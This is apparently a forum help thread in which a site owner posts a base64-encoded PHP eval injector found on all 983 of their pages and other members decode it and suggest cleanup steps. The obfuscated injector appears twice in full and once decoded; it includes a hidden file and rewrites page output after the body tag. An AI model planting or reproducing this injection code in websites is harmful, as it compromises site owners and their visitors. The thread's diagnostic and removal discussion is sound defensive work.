<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9zb2NyaW1lL3B1YmxpY19odG1sL3QyL3NhbmRib3gvYmFja3VwLTguNi4yMDA4XzIwLTE1LTIwX3NvY3JpbWUvaG9tZWRpci9wdWJsaWNfaHRtbC9waHB0ZXN0aW5nL3g3Y2hhdDIvZG9jcy9pbnN0YWxsLmRyYWdvbmZseS94N2NoYXQvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL3NvY3JpbWUvcHVibGljX2h0bWwvdDIvc2FuZGJveC9iYWNrdXAtOC42LjIwMDhfMjAtMTUtMjBfc29jcmltZS9ob21lZGlyL3B1YmxpY19odG1sL3BocHRlc3RpbmcveDdjaGF0Mi9kb2NzL2luc3RhbGwuZHJhZ29uZmx5L3g3Y2hhdC9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>


Can any help me find out what this means???? its appearing on all of my pages, i have no clue what it is  :wtf:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9zb2NyaW1lL3B1YmxpY19odG1sL3QyL3NhbmRib3gvYmFja3VwLTguNi4yMDA4XzIwLTE1LTIwX3NvY3JpbWUvaG9tZWRpci9wdWJsaWNfaHRtbC9waHB0ZXN0aW5nL3g3Y2hhdDIvZG9jcy9pbnN0YWxsLmRyYWdvbmZseS94N2NoYXQvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL3NvY3JpbWUvcHVibGljX2h0bWwvdDIvc2FuZGJveC9iYWNrdXAtOC42LjIwMDhfMjAtMTUtMjBfc29jcmltZS9ob21lZGlyL3B1YmxpY19odG1sL3BocHRlc3RpbmcveDdjaGF0Mi9kb2NzL2luc3RhbGwuZHJhZ29uZmx5L3g3Y2hhdC9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>


It's base64, an almost sad form of obfuscation, but here's the decoded result:

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/socrime/public_html/t2/sandbox/backup-8.6.2008_20-15-20_socrime/homedir/public_html/phptesting/x7chat2/docs/install.dragonfly/x7chat/style.css.php')){include_once('/home/socrime/public_html/t2/sandbox/backup-8.6.2008_20-15-20_socrime/homedir/public_html/phptesting/x7chat2/docs/install.dragonfly/x7chat/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&{$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}


There's no lines since the base64 encoding stripped them.


EDIT: 'socrime', is that your username? May be an XSS attack if it were appearing on your pages for no reason.. 'install.dragonfly', Not sure what dragonfly is.

but how is it affecting me?

... and how did it get there? :(


It looks like it's attempting to replace your 'body' tags with some sort of chat? Or program of some sort. I believe it is a hacking attempt, as it has a stupidly simple obfuscation technique. Change your passwords, especially FTP/Your site account's. And remove it from every file you have.


EDIT: Dragonfly looks like it's a CMS, do you use this? It may have been autogenerated if you're using some sort of content generator.. But i'm not sure why it would be encoded, I still think it's not supposed to be there.

lol, all 983? :-[

I see a fun night coming up!


Wow, Man that must suck.. I'd recommend using some sort of batch text replacer, shouldn't be too hard to FTP them off site and use one, I've found some online. If the codes are the same (should be) you can simply replace them all at one go.


But yeah, change your passwords! Good luck.

but, when there gone, my content isnt showing???

how do i fix that?

and i have never heard of dragogon fly, no


Uh oh.. Are there any other files on your server such as .htaccess that have entries you did not include? SOMETHING may have been further modified to prevent you from removing their code, look in your php file that doesn't work without it for example, is that the only thing changed?


I'd look online with some of that code.. You can re-decode the base64 here if you wish http://www.motobit.com/util/base64-decoder-encoder.asp?charset=iso-8859-1&acharset=


There may be an entry somewhere online describing the type of attack and how to remove it.

AuthName "test"
AuthUserFile "/home/socrime/.htpasswds/public_html/2/passwd"

thats all of it... should i delete it?


I just need to know, is your hosting username 'socrime' or similar? But yes, if you did not create that than you should delete it , from the looks of it, it's hiding the directories of domain.com/2/..

done... pages where i deleted the base decode... still not working tho :(


Maybe upload and show me a full page, such as your index. Maybe something was changed, I could spot it if it's in the .php file itself. If it isn't, than php.ini or so may have been modified.



I'm positive it hasn't been further modified(the page i found it on)

i did notice some "core.33134" files appeared, i think there encoded though

about 10 files actually, all "core.(some number)"


There are some threads with somewhat helpful info here..




But yeah, from the look of it, and the nature of php being open source, you're messed without a backup or a lot of time..

